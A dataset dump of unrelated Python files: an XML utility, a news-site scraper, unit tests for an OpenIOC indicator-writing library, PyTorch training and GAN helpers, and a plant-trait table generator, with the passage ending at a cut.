\"</%s>\" % self.tagName\n        return s\n\n    def toXML(self):\n        xmlRoot = ET.Element(self.tagName)\n        for element in self.dctEle.keys():\n            value = getattr(self, element)\n            if value is not None:\n                x = ET.SubElement(xmlRoot, element)\n                x.text = str(value)\n        for element in self.dctXML.keys():\n            if hasattr(self, element):\n                value = getattr(self, element)\n                if value is not None:\n                    ele = value.toXML()\n                    xmlRoot.append(ele)\n        return xmlRoot\n\n    def __str__(self):\n        s = \"%-6s -\" % self.tagName\n        for element in self.dctEle.keys():\n            s += \" %s:%s\" % (element, getattr(self, element))\n        return s\n\n\nlstXMLSpecialChars = [\n    (\"&\", \"&amp;\"),  # must be first\n    (\"<\", \"&lt;\"),\n    (\">\", \"&gt;\"),\n    (\"'\", \"&apos;\"),\n    ('\"', \"&quot;\"),\n]\n\n\ndef xmlReplaceEscapeChars(text):\n    \"\"\" replace all special characters in XML \"\"\"\n    for tup in lstXMLSpecialChars:\n        text = text.replace(tup[0], tup[1])\n    return text\n\n\nXML_INDENT = \"  \"\n\n\ndef xmlString(eleRoot, level=0):\n    \"\"\" Create a string of XML element \"\"\"\n\n    s = level * XML_INDENT + \"<%s\" % eleRoot.tag\n    # attributes\n    for name, value in eleRoot.items():\n        s += ' %s=\"%s\"' % (name, xmlReplaceEscapeChars(value))\n    if len(eleRoot):\n        # nested elements\n        s += \">\\n\"\n        for ele in eleRoot:\n            s += xmlString(ele, level + 1)\n        s += level * XML_INDENT + \"</%s>\\n\" % eleRoot.tag\n    else:\n        # simple element\n        if eleRoot.text:\n            s += \">\" + xmlReplaceEscapeChars(eleRoot.text) + \"</%s>\\n\" % eleRoot.tag\n        else:\n            s += \" />\\n\"\n    return s\n\n\nif __name__ == \"__main__\":\n    print(\"xml_util tests\")\n    # representative samples; the original tag markup was stripped, so generic <test> tags are used\n    lstXML = [\n        \"<test />\",\n        \"<test>Data</test>\",\n        \"<test></test>\",\n        \"<test> Data </test>\",\n        \"<test attr='value'>Data</test>\",\n        \"<test>Data &lt; 5</test>\",\n    ]\n    for xml in lstXML:\n        print(\"XML:%s\" % xml)\n        ele = ET.XML(xml)\n        print(xmlString(ele))\n","sub_path":"util/xml_util.py","file_name":"xml_util.py","file_ext":"py","file_size_in_byte":8436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"467989839","text":"import scrapy\nimport os\n\nclass ToiSpider(scrapy.Spider):\n    name = \"toi\"\n    start_urls = [\n        \"http://timesofindia.indiatimes.com/tech/\"\n    ]\n\n    #typical url 'http://timesofindia.indiatimes.com/tech/tech-news/title/articleshow/47827034.cms'\n    def parse_callback(self, response):\n        try:\n            title, category = response.url.split(\"/\")[-3], response.url.split(\"/\")[-5]\n            filename = 'crawled/' + category + '/' + title + '.html'\n            title = response.xpath('//span[@class = 
\"arttle\"]/h1/text()').extract()[0]\n image = response.xpath('//div[@class = \"mainimg1\"]//img/@src').extract()[0]\n content = \"\\n\".join(response.xpath('//div[@class = \"Normal\"]/text()').extract()) \n except:\n return\n with open(filename, 'w') as f:\n f.write(title +\"\\n\\n\"+ image+\"\\n\\n\"+content)\n\n\n def parse(self, response):\n links = []\n #crawled/tech or crawled/politics \n directory = 'crawled/' + response.url.split(\"/\")[-1]\n if not os.path.exists( directory):\n os.makedirs(directory)\n\n for href in response.xpath('//@href').extract():\n #if base url there in href\n if response.url in href:\n if href.split('?')[0] not in links:\n links.append(href)\n yield scrapy.Request(href, callback=self.parse_callback)\n\n with open('links','w') as f:\n f.write(\"\\n\".join(links))\n","sub_path":"newscrawler/toi/toi/spiders/toispider.py","file_name":"toispider.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"614122893","text":"\nimport pandas as pd\nfrom pathlib import Path\nfrom concurrent.futures import ProcessPoolExecutor as PPE\n\ndef pmap(arg):\n path = arg\n print(path)\n \n df = pd.read_csv(path)\n df = df[pd.notnull(df['性別'])]\n #df['time'] = pd.to_datetime(df['time'])\n #lower = pd.to_datetime('2019-01-01')\n df['label'] = df['性別'].apply(lambda x:1 if x == '女性' else 0)\n df.to_csv(str(path).replace('/A/', '/B_gender/'), index=None)\nargs = [path for path in Path().glob('tmp/A/*.csv')]\nPath('tmp/B_gender').mkdir(exist_ok=True, parents=True)\n#[pmap(arg) for arg in args]\nwith PPE(max_workers=8) as exe:\n exe.map(pmap, args)\n","sub_path":"B002_make_label_gender.py","file_name":"B002_make_label_gender.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499332657","text":"\"\"\"\ntests.py from ioc_writer\nCreated: 12/3/15\n\nPurpose:\n\nExamples:\n\nUsage:\n\n\"\"\"\n# Stdlib\nfrom __future__ import print_function\nimport logging\nimport os\nimport unittest\n# Third Party code\nfrom lxml import etree as et\n# Custom Code\nimport ioc_writer.ioc_api as ioc_api\nimport ioc_writer.ioc_et as ioc_et\nimport ioc_writer.managers as managers\nimport ioc_writer.managers.downgrade_11 as downgrade_11\n\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(message)s [%(filename)s:%(funcName)s]')\nlog = logging.getLogger(__name__)\n\n\nOPENIOC_11_ASSETS = os.path.join(os.path.split(__file__)[0], 'assets/openioc_11_assets')\n\n\nclass TestIocEt(unittest.TestCase):\n def setUp(self):\n self.author = 'unittest'\n self.content_text = 'foobar.exe'\n self.content_type = 'string'\n self.context_document = 'FileItem'\n self.context_search = 'FileItem/Md5sum'\n self.context_type = 'testType'\n self.description = 'Test description'\n self.iocid = '1234'\n self.keywords = 'Foo Bar Baz'\n self.links = [('testRel', None, 'testValue'),\n ('testRel2', 'https://www.fireeye.com', 'testValue2',)]\n self.name = 'Test name'\n self.params = [{'nid': '1234-5678',\n 'content': 'I am a string!'},\n {'nid': '1234-9abc',\n 'content': 'I am a string!',\n 'name': 'comment',\n 'ptype': 'string'},\n {'nid': '1234-def0',\n 'content': 'true',\n 'name': 'some_value',\n 'ptype': 'bool'},\n ]\n\n def test_make_criteria_node(self):\n r = ioc_et.make_criteria_node()\n self.assertEqual(r.tag, 'criteria')\n\n def test_make_criteria_node_invalid(self):\n bad_node = et.Element('BadNode')\n with 
self.assertRaises(ValueError):\n r = ioc_et.make_criteria_node(indicator_node=bad_node)\n\n def test_make_content_node(self):\n r = ioc_et.make_content_node(ctype=self.content_type,\n content=self.content_text)\n self.assertEqual(r.tag, 'Content')\n self.assertEqual(r.text, self.content_text)\n self.assertEqual(r.attrib.get('type'), self.content_type)\n\n def test_make_context_node(self):\n r = ioc_et.make_context_node(document=self.context_document, search=self.context_search)\n self.assertEqual(r.tag, 'Context')\n self.assertEqual(r.text, None)\n self.assertEqual(r.attrib.get('document'), self.context_document)\n self.assertEqual(r.attrib.get('search'), self.context_search)\n self.assertEqual(r.attrib.get('type'), 'mir')\n\n def test_make_context_node_param(self):\n r = ioc_et.make_context_node(document=self.context_document, search=self.context_search,\n context_type=self.context_type)\n self.assertEqual(r.tag, 'Context')\n self.assertEqual(r.text, None)\n self.assertEqual(r.attrib.get('document'), self.context_document)\n self.assertEqual(r.attrib.get('search'), self.context_search)\n self.assertEqual(r.attrib.get('type'), self.context_type)\n\n def test_make_parameters_node(self):\n r = ioc_et.make_parameters_node()\n self.assertEqual(r.tag, 'parameters')\n\n def test_make_parm_node(self):\n for param in self.params:\n r = ioc_et.make_param_node(**param)\n self.assertEqual(r.tag, 'param')\n self.assertEqual(len(r.getchildren()), 1)\n vnode = r.getchildren()[0]\n self.assertEqual(vnode.tag, 'value')\n self.assertIn('id', r.attrib)\n self.assertEqual(r.attrib.get('ref-id'), param.get('nid'))\n self.assertEqual(vnode.text, param.get('content'))\n if 'name' in param:\n self.assertEqual(r.attrib.get('name'), param.get('name'))\n else:\n self.assertEqual(r.attrib.get('name'), 'comment')\n if 'ptype' in param:\n self.assertEqual(vnode.attrib.get('type'), param.get('ptype'))\n else:\n self.assertEqual(vnode.attrib.get('type'), 'string')\n\n def test_make_link_node(self):\n rel, href, value = self.links[0]\n r = ioc_et.make_link_node(rel, value, href)\n self.assertEqual(r.tag, 'link')\n self.assertEqual(r.attrib.get('rel'), rel)\n self.assertEqual(r.attrib.get('href'), href)\n self.assertEqual(r.text, value)\n\n rel2, href2, value2 = self.links[1]\n r2 = ioc_et.make_link_node(rel2, value2, href2)\n self.assertEqual(r2.tag, 'link')\n self.assertEqual(r2.attrib.get('rel'), rel2)\n self.assertEqual(r2.attrib.get('href'), href2)\n self.assertEqual(r2.text, value2)\n\n def test_make_links_node(self):\n r = ioc_et.make_links_node(self.links)\n self.assertEqual(r.tag, 'links')\n for i, link in enumerate(r.getchildren()):\n self.assertEqual(link.tag, 'link')\n rel, href, value = self.links[i]\n self.assertEqual(link.attrib['rel'], rel)\n self.assertEqual(link.attrib.get('href'), href)\n self.assertEqual(link.text, value)\n\n def test_make_authored_date_node(self):\n r = ioc_et.make_authored_date_node()\n self.assertEqual(r.tag, 'authored_date')\n\n def test_make_authored_by_node(self):\n r = ioc_et.make_authored_by_node()\n self.assertEqual(r.tag, 'authored_by')\n self.assertEqual(r.text, 'ioc_et')\n r2 = ioc_et.make_authored_by_node(author=self.author)\n self.assertEqual(r2.text, self.author)\n\n def test_make_description_node(self):\n r = ioc_et.make_description_node(self.description)\n self.assertEqual(r.tag, 'description')\n self.assertEqual(r.text, self.description)\n\n def test_make_short_description_node(self):\n r = ioc_et.make_short_description_node(self.name)\n self.assertEqual(r.tag, 
'short_description')\n self.assertEqual(r.text, self.name)\n\n def test_make_keywords_node(self):\n r = ioc_et.make_keywords_node()\n self.assertEqual(r.tag, 'keywords')\n self.assertEqual(r.text, None)\n r2 = ioc_et.make_keywords_node(keywords=self.keywords)\n self.assertEqual(r2.text, self.keywords)\n\n def test_make_ioc_root(self):\n r = ioc_et.make_ioc_root()\n self.assertEqual(r.tag, 'OpenIOC')\n required_attribs = ['id', 'last-modified', 'published-date', 'xmlns']\n for attribute in required_attribs:\n self.assertIn(attribute, r.attrib)\n\n def test_make_ioc_root_provided_id(self):\n r = ioc_et.make_ioc_root(iocid=self.iocid)\n self.assertEqual(r.attrib['id'], self.iocid)\n\n def test_make_metadata_node(self):\n r = ioc_et.make_metadata_node()\n self.assertEqual(r.tag, 'metadata')\n child_note_tags = ['short_description',\n 'description',\n 'keywords',\n 'authored_by',\n 'authored_date',\n 'links']\n for tag in child_note_tags:\n n = r.find(tag)\n self.assertTrue(n is not None)\n self.assertEqual(n.tag, tag)\n\n def test_make_metadata_node_provided_data(self):\n r = ioc_et.make_metadata_node(name=self.name,\n description=self.description,\n author=self.author,\n links=self.links)\n self.assertEqual(r.find('description').text, self.description)\n self.assertEqual(r.find('short_description').text, self.name)\n self.assertEqual(r.find('authored_by').text, self.author)\n links = r.find('links')\n for i, link in enumerate(links.getchildren()):\n rel, href, value = self.links[i]\n self.assertEqual(link.attrib['rel'], rel)\n self.assertEqual(link.attrib.get('href'), href)\n self.assertEqual(link.text, value)\n\n\nclass TestIOCApi(unittest.TestCase):\n def setUp(self):\n self.author = 'unittest'\n self.content_text = 'foobar.exe'\n self.content_type = 'string'\n self.context_document = 'FileItem'\n self.context_search = 'FileItem/Md5sum'\n self.context_type = 'testType'\n self.description = 'Test description'\n self.iocid = '1234'\n self.keywords = 'Foo Bar Baz'\n self.links = [('testRel', None, 'testValue'),\n ('testRel2', 'https://www.fireeye.com', 'testValue2',)]\n self.name = 'Test name'\n self.params = [{'nid': '1234-5678',\n 'content': 'I am a string!'},\n {'nid': '1234-9abc',\n 'content': 'I am a string!',\n 'name': 'comment',\n 'ptype': 'string'},\n {'nid': '1234-def0',\n 'content': 'true',\n 'name': 'some_value',\n 'ptype': 'bool'},\n ]\n\n def test_ioc_class_creation_blank(self):\n ioc_obj = ioc_api.IOC()\n self.assertEqual(ioc_obj.metadata.findtext('authored_by'), 'IOC_api')\n self.assertEqual(ioc_obj.metadata.findtext('description'), 'Automatically generated IOC')\n self.assertEqual(ioc_obj.metadata.findtext('short_description'), '')\n self.assertEqual(ioc_obj.metadata.findtext('keywords'), '')\n self.assertEqual(len(ioc_obj.metadata.find('links').getchildren()), 0)\n\n def test_ioc_class_creation_provided_params(self):\n ioc_obj = ioc_api.IOC(name=self.name,\n description=self.description,\n author=self.author,\n links=self.links,\n keywords=self.keywords,\n iocid=self.iocid)\n self.assertEqual(ioc_obj.metadata.findtext('authored_by'), self.author)\n self.assertEqual(ioc_obj.metadata.findtext('description'), self.description)\n self.assertEqual(ioc_obj.metadata.findtext('short_description'), self.name)\n self.assertEqual(ioc_obj.metadata.findtext('keywords'), self.keywords)\n self.assertEqual(len(ioc_obj.metadata.find('links').getchildren()), 2)\n\n def test_ioc_class_creation_file(self):\n iocid = '378f0cce-b8df-41d5-8189-3d7ec102e52f'\n fn = '{}.ioc'.format(iocid)\n fp = 
os.path.join(OPENIOC_11_ASSETS, fn)\n ioc_obj = ioc_api.IOC(fp)\n self.assertEqual(ioc_obj.iocid, iocid)\n self.assertEqual(len(ioc_obj.top_level_indicator.getchildren()), 7)\n\n\nclass TestIOCAPIFuncs(unittest.TestCase):\n def setUp(self):\n self.nid = '1234'\n self.operators = ['AND', 'OR', 'and', 'or']\n self.conditions = ['is',\n 'contains',\n 'matches',\n 'starts-with',\n 'ends-with',\n 'greater-than',\n 'less-than']\n self.context_document = 'FileItem'\n self.context_search = 'FileItem/Md5sum'\n self.context_type = 'testType'\n self.content = '5678'\n self.content_type = 'int'\n\n def test_make_i_node(self):\n for op in self.operators:\n inode = ioc_api.make_indicator_node(op)\n self.assertEqual(inode.get('operator'), op.upper())\n self.assertNotEqual(inode.get('id'), self.nid)\n inode = ioc_api.make_indicator_node(op, nid=self.nid)\n self.assertEqual(inode.get('operator'), op.upper())\n self.assertEqual(inode.get('id'), self.nid)\n\n def test_make_i_node_bad(self):\n op = 'FooBar'\n with self.assertRaises(ValueError):\n inode = ioc_api.make_indicator_node(op)\n\n def test_make_ii_node(self):\n for condition in self.conditions:\n ii_node = ioc_api.make_indicatoritem_node(condition=condition,\n document=self.context_document,\n search=self.context_search,\n content_type=self.content_type,\n content=self.content)\n self.assertEqual(ii_node.get('condition'), condition)\n self.assertEqual(ii_node.get('preserve-case'), 'false')\n self.assertEqual(ii_node.get('negate'), 'false')\n self.assertEqual(ii_node.findtext('Content'), self.content)\n self.assertEqual(ii_node.find('Content').get('type'), self.content_type)\n self.assertEqual(ii_node.find('Context').get('document'), self.context_document)\n self.assertEqual(ii_node.find('Context').get('search'), self.context_search)\n self.assertEqual(ii_node.find('Context').get('type'), 'mir') # Default value\n\n ii_node = ioc_api.make_indicatoritem_node(condition='is',\n document=self.context_document,\n search=self.context_search,\n content_type=self.content_type,\n content=self.content,\n context_type='notMir',\n nid=self.nid)\n self.assertEqual(ii_node.find('Context').get('type'), 'notMir')\n self.assertEqual(ii_node.get('id'), self.nid)\n\n for preserve_case in [True, False]:\n for negate in [True, False]:\n ii_node = ioc_api.make_indicatoritem_node(condition='is',\n document=self.context_document,\n search=self.context_search,\n content_type=self.content_type,\n content=self.content,\n preserve_case=preserve_case,\n negate=negate)\n self.assertEqual(ii_node.get('preserve-case'), 'true' if preserve_case else 'false')\n self.assertEqual(ii_node.get('negate'), 'true' if negate else 'false')\n\n def test_make_ii_node_bad_condition(self):\n with self.assertRaises(ValueError) as cm:\n ii_node = ioc_api.make_indicatoritem_node(condition='foobarbaz',\n document=self.context_document,\n search=self.context_search,\n content_type=self.content_type,\n content=self.content)\n\n\nclass IOCTestManager(managers.IOCManager):\n \"\"\"\n Test class for testing the parser callback functionality.\n \"\"\"\n def __init__(self):\n managers.IOCManager.__init__(self)\n self.child_count = {}\n self.register_parser_callback(self.parse_callback)\n\n def parse_callback(self, ioc_obj):\n c = ioc_obj.top_level_indicator.getchildren()\n self.child_count[ioc_obj.iocid] = len(c)\n\n\nclass TestIOCManager(unittest.TestCase):\n def setUp(self):\n self.iocm = managers.IOCManager()\n self.test_iocm = IOCTestManager()\n\n\n def test_iocm(self):\n iocids = 
{'378f0cce-b8df-41d5-8189-3d7ec102e52f',\n '55075e99-273a-4b81-b92b-672be6666474',\n 'c158ef8c-e664-43c5-b71d-3488a3325fcb'}\n self.iocm.insert(OPENIOC_11_ASSETS)\n self.assertEqual(len(self.iocm), 3)\n self.assertEqual(set(self.iocm.iocs.keys()), iocids)\n\n def test_custom_iocm(self):\n expected_dict = {'378f0cce-b8df-41d5-8189-3d7ec102e52f': 7,\n '55075e99-273a-4b81-b92b-672be6666474': 1,\n 'c158ef8c-e664-43c5-b71d-3488a3325fcb': 2}\n self.test_iocm.insert(OPENIOC_11_ASSETS)\n self.assertDictEqual(self.test_iocm.child_count, expected_dict)\n\n def test_custom_iocm_fail(self):\n with self.assertRaises(TypeError):\n self.test_iocm.register_parser_callback('1234')\n\n\nclass TestDowngrade(unittest.TestCase):\n def setUp(self):\n self.iocm = managers.downgrade_11.DowngradeManager()\n\n def test_downgrade(self):\n self.iocm.insert(OPENIOC_11_ASSETS)\n self.iocm.convert_to_10()\n self.assertEqual(set(self.iocm.iocs_10.keys())-(self.iocm.pruned_11_iocs.union(self.iocm.null_pruned_iocs)),\n {'c158ef8c-e664-43c5-b71d-3488a3325fcb'})\n self.assertEqual(self.iocm.pruned_11_iocs, {'378f0cce-b8df-41d5-8189-3d7ec102e52f'})\n self.assertEqual(self.iocm.null_pruned_iocs, {'55075e99-273a-4b81-b92b-672be6666474'})\n expected_dict = {'378f0cce-b8df-41d5-8189-3d7ec102e52f': 1,\n '55075e99-273a-4b81-b92b-672be6666474': 0,\n 'c158ef8c-e664-43c5-b71d-3488a3325fcb': 2}\n for iocid, num_children in expected_dict.items():\n ioc_obj = self.iocm.iocs_10.get(iocid)\n self.assertEqual(len(ioc_obj.top_level_indicator.getchildren()), num_children)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":17599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"623373681","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\n\n#### Loss Functions ####\n\ndef dice_loss(input, target):\n '''\n Input: two tensors of the same shape\n Returns: the soft dice score\n '''\n smooth = 1.\n\n iflat = input.view(-1)\n tflat = target.view(-1)\n intersection = (iflat * tflat).sum()\n \n return 1 - ((2. * intersection + smooth) /\n (iflat.sum() + tflat.sum() + smooth))\n\ndef dice_hard_loss(input, target):\n '''\n Input: two tensors of the same shape\n Returns: the hard dice score\n '''\n smooth = 0.001\n #iflat = input.view(-1)\n #tflat = target.view(-1)\n iflat = input\n tflat = target\n \n intersection = (iflat * tflat).sum()\n \n return ((2. 
* intersection + smooth) /(iflat.sum() + tflat.sum() + smooth))\n\n#### Triangular Learning Rate ####\n\ndef get_triangular_lr2(lr_low, lr_high, stepesize):\n '''\n Input:\n lr_low: The lowest learning rate to train at\n lr_high: The highest learning rate to train at\n stepesize: The ammount of steps to take\n Returns: the hard dice score\n '''\n iterations = 2*stepesize\n iter1 = int(0.35*iterations)\n iter2 = int(0.85*iter1)\n iter3 = iterations - iter1 - iter2\n delta1 = (lr_high - lr_low)/iter1\n delta2 = (lr_high - lr_low)/(iter1 -1)\n lrs1 = [lr_low + i*delta1 for i in range(iter1)]\n lrs2 = [lr_high - i*(delta1) for i in range(0, iter2)]\n delta2 = (lrs2[-1] - lr_low)/(iter3)\n lrs3 = [lrs2[-1] - i*(delta2) for i in range(1, iter3+1)]\n return lrs1+lrs2+lrs3\ndef train_triangular_policy(model, train_dl, valid_dl, lr_low=1e-5, lr_high=0.01):\n idx = 0\n epochs = 4\n stepesize = 2*len(train_dl)\n lrs = get_triangular_lr2(lr_low, lr_high, stepesize)\n for i in range(epochs):\n model.train()\n total = 0\n sum_loss = 0\n for i, (mod_input) in enumerate(train_dl):\n x,y = mod_input['x'],mod_input['y']\n\n optim = get_optimizer(model, lr = lrs[idx], wd =0)\n batch = y.shape[0]\n x = x.float()\n y = y.float()\n out = model(x)\n loss = F.binary_cross_entropy_with_logits(out, y)\n optim.zero_grad()\n loss.backward()\n optim.step()\n idx += 1\n total += batch\n sum_loss += batch*(loss.item())\n print(\"train loss\", sum_loss/total)\n train_loss=sum_loss/total\n val_loss = val_metrics(model, valid_dl)\n return train_loss,val_loss\n\n\n\ndef val_metrics(model, valid_dl):\n model.eval()\n total = 0\n sum_loss = 0\n correct = 0 \n for input in valid_dl:\n model.eval()\n\n x = input['x']\n y = input['y'].long()\n batch = y.shape[0]\n x = x.float()\n y = y.unsqueeze(1)\n out = model(x)\n pred = (out > 0.0).long()\n correct += pred.eq(y.data).sum().item()\n y = y.float().squeeze(1)\n loss = F.binary_cross_entropy_with_logits(out, y)\n sum_loss += batch*(loss.item())\n total += batch\n print(\"val loss and accuracy\", sum_loss/total, correct/total)\n return correct/total\n\n\n\n\ndef LR_range_finder(model, train_dl, lr_low=1e-5, lr_high=1, epochs=2):\n losses = []\n p = PATH/\"mode_tmp.pth\"\n save_model(model, str(p))\n iterations = epochs * len(train_dl)\n delta = (lr_high - lr_low)/iterations\n lrs = [lr_low + i*delta for i in range(iterations)]\n model.train()\n ind = 0\n \n for i in range(epochs):\n for sample in train_dl:\n x,y = sample['image'],sample['mask']\n\n optim = get_optimizer(model, lr=lrs[ind])\n x = x.cuda().float()\n y = y.cuda().float()\n out = model(x)\n loss = F.binary_cross_entropy_with_logits(out, y)\n optim.zero_grad()\n loss.backward()\n optim.step()\n losses.append(loss.item())\n ind +=1\n \n load_model(model, str(p))\n return lrs, losses\n\n\n\ndef get_optimizer(model, lr = 0.01, wd = 0.0):\n parameters = filter(lambda p: p.requires_grad, model.parameters())\n optim = torch.optim.Adam(parameters, lr=lr, weight_decay=wd)\n return optim\ndef save_model(m, p): torch.save(m.state_dict(), p)\n \ndef load_model(m, p): m.load_state_dict(torch.load(p))\nimport os, gzip, torch\nimport torch.nn as nn\nimport numpy as np\nimport scipy.misc\nimport imageio\nimport matplotlib.pyplot as plt\nfrom torchvision import datasets, transforms\n\ndef load_mnist(dataset):\n data_dir = os.path.join(\"./data\", dataset)\n\n def extract_data(filename, num_data, head_size, data_size):\n with gzip.open(filename) as bytestream:\n bytestream.read(head_size)\n buf = bytestream.read(data_size * 
num_data)\n data = np.frombuffer(buf, dtype=np.uint8).astype(np.float)\n return data\n\n data = extract_data(data_dir + '/train-images-idx3-ubyte.gz', 60000, 16, 28 * 28)\n trX = data.reshape((60000, 28, 28, 1))\n\n data = extract_data(data_dir + '/train-labels-idx1-ubyte.gz', 60000, 8, 1)\n trY = data.reshape((60000))\n\n data = extract_data(data_dir + '/t10k-images-idx3-ubyte.gz', 10000, 16, 28 * 28)\n teX = data.reshape((10000, 28, 28, 1))\n\n data = extract_data(data_dir + '/t10k-labels-idx1-ubyte.gz', 10000, 8, 1)\n teY = data.reshape((10000))\n\n trY = np.asarray(trY).astype(np.int)\n teY = np.asarray(teY)\n\n X = np.concatenate((trX, teX), axis=0)\n y = np.concatenate((trY, teY), axis=0).astype(np.int)\n\n seed = 547\n np.random.seed(seed)\n np.random.shuffle(X)\n np.random.seed(seed)\n np.random.shuffle(y)\n\n y_vec = np.zeros((len(y), 10), dtype=np.float)\n for i, label in enumerate(y):\n y_vec[i, y[i]] = 1\n\n X = X.transpose(0, 3, 1, 2) / 255.\n # y_vec = y_vec.transpose(0, 3, 1, 2)\n\n X = torch.from_numpy(X).type(torch.FloatTensor)\n y_vec = torch.from_numpy(y_vec).type(torch.FloatTensor)\n return X, y_vec\n\ndef load_celebA(dir, transform, batch_size, shuffle):\n # transform = transforms.Compose([\n # transforms.CenterCrop(160),\n # transform.Scale(64)\n # transforms.ToTensor(),\n # transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n # ])\n\n # data_dir = 'data/celebA' # this path depends on your computer\n dset = datasets.ImageFolder(dir, transform)\n data_loader = torch.utils.data.DataLoader(dset, batch_size, shuffle)\n\n return data_loader\n\n\ndef print_network(net):\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\ndef save_images(images, size, image_path):\n return imsave(images, size, image_path)\n\ndef imsave(images, size, path):\n image = np.squeeze(merge(images, size))\n return scipy.misc.imsave(path, image)\n\ndef merge(images, size):\n h, w = images.shape[1], images.shape[2]\n if (images.shape[3] in (3,4)):\n c = images.shape[3]\n img = np.zeros((h * size[0], w * size[1], c))\n for idx, image in enumerate(images):\n i = idx % size[1]\n j = idx // size[1]\n img[j * h:j * h + h, i * w:i * w + w, :] = image\n return img\n elif images.shape[3]==1:\n img = np.zeros((h * size[0], w * size[1]))\n for idx, image in enumerate(images):\n i = idx % size[1]\n j = idx // size[1]\n img[j * h:j * h + h, i * w:i * w + w] = image[:,:,0]\n return img\n else:\n raise ValueError('in merge(images,size) images parameter ''must have dimensions: HxW or HxWx3 or HxWx4')\n\ndef generate_animation(path, num):\n images = []\n for e in range(num):\n img_name = path + '_epoch%03d' % (e+1) + '.png'\n images.append(imageio.imread(img_name))\n imageio.mimsave(path + '_generate_animation.gif', images, fps=5)\n\ndef loss_plot(hist, path = 'Train_hist.png', model_name = ''):\n x = range(len(hist['D_loss']))\n\n y1 = hist['D_loss']\n y2 = hist['G_loss']\n\n plt.plot(x, y1, label='D_loss')\n plt.plot(x, y2, label='G_loss')\n\n plt.xlabel('Iter')\n plt.ylabel('Loss')\n\n plt.legend(loc=4)\n plt.grid(True)\n plt.tight_layout()\n\n path = os.path.join(path, model_name + '_loss.png')\n\n plt.savefig(path)\n\n plt.close()\n\ndef initialize_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d):\n m.weight.data.normal_(0, 0.02)\n m.bias.data.zero_()\n elif isinstance(m, nn.ConvTranspose2d):\n m.weight.data.normal_(0, 0.02)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n 
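# (added note) linear layers are given the same zero-mean, std-0.02 DCGAN-style init as the conv layers\n            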
m.weight.data.normal_(0, 0.02)\n            m.bias.data.zero_()\n","sub_path":"Computer_Vision/UCSF_Code/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"290115225","text":"import os\nimport random as rd\nimport math\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nn = 10 # number of plant life strategies\n\ndef print_histogram(arr, b = 200, n=True):\n    values = plt.hist(arr, bins=b, density=n) # 'normed' was removed from recent matplotlib releases; 'density' is the equivalent\n    plt.show()\n\n\ndef table_gen(N = n):\n    # Random variables (beta distribution - normalized to min-max ranges of each variable)\n    #g1 = np.linspace(1.6, 7.1, 10) # 10 elements\n    g1 = np.random.beta(1.4, 6.24, 10000) * (7.1 - 1.6/1.) + 1.6 # 10⁴ elements\n    #vcmax = np.linspace(3.e-5,25e-5,10) # 10 elements\n    vcmax = (np.random.beta(1.4, 6.24, 10000) * (25. - 3./1.) + 3) * 1e-5 # 10⁴ elements\n    #jmax = np.linspace(1e-4,3e-4,10) # 10 elements\n    jmax = (np.random.beta(1.4, 6.24, 10000) * (3. - 1./1.) + 1.) * 1e-4 # 10⁴ elements\n\n    #tleaf = np.arange(1,100,12)/12 # years, 9 elements\n    tleaf = (np.random.beta(3, 6.24,10000) * (100. - 1./1.) + 1.) / 12 # 10⁴ elements\n    #twood = np.arange(1,80,5) # 16 elements\n    twood = np.random.beta(6, 6.24,10000) * (80. - 1./1.) + 1. # 10⁴ elements\n    #troot = np.arange(1,100,12)/12 # 9 elements\n    troot = (np.random.beta(3, 6.24,10000) * (100. - 1./1.) + 1.) / 12 # 10⁴ elements\n\n    # constrained distributions (must sum up to 1.)\n    aleaf = np.arange(20,81,1.25) #\n    aroot = np.arange(20,81,1.25) # 13\n    awood = np.arange(20,81,1.25) # 13\n    colnames_a = ['aleaf','awood','aroot']\n    plsa_grass = [[a/100,0.0,c/100] for a in aleaf for c in aroot if abs(a+0.0+c)==100.]\n    plsa_wood = [[a/100,b/100,c/100] for a in aleaf for b in awood for c in aroot if ((a+b+c)==100.) and (b>19)]\n\n    # CREATING ALLOCATION COMBINATIONS\n    for i in range(len(plsa_grass)):\n        x = plsa_grass.pop()\n        if x in plsa_grass:\n            pass\n        else:\n            plsa_grass.insert(0,x)\n\n    for i in range(len(plsa_wood)):\n        x = plsa_wood.pop()\n        if x in plsa_wood:\n            pass\n        else:\n            plsa_wood.insert(0,x)\n\n    g2w_ratio = len(plsa_grass)/len(plsa_wood)\n\n\n\n    if (len(plsa_wood) + len(plsa_grass)) < N:\n        diffg = math.ceil(N * (g2w_ratio) - (len(plsa_grass)))\n        diffw = N - diffg\n        alloc_w = plsa_wood[:]\n        alloc_g = plsa_grass[:]\n        while len(alloc_w) <= diffw:\n            alloc_w.append(plsa_wood[np.random.randint(0,len(plsa_wood))])\n        while len(alloc_g) <= diffg:\n            alloc_g.append(plsa_grass[np.random.randint(0,len(plsa_grass))])\n\n        plsa_wood = alloc_w\n        plsa_grass = alloc_g\n        grassN = diffg\n        woodN = diffw\n\n\n    else:\n        grassN = math.ceil(N * g2w_ratio)\n        woodN = N - grassN\n\n    grassN = int(grassN)\n    woodN = int(woodN)\n\n    plsa_wood = np.array(plsa_wood,np.float32)\n    plsa_grass = np.array(plsa_grass,np.float32)\n    np.random.shuffle(plsa_grass)\n    np.random.shuffle(plsa_wood)\n\n\n    alloc_wood = plsa_wood[np.random.randint(0,woodN-1,woodN)][:]\n    alloc_grass = 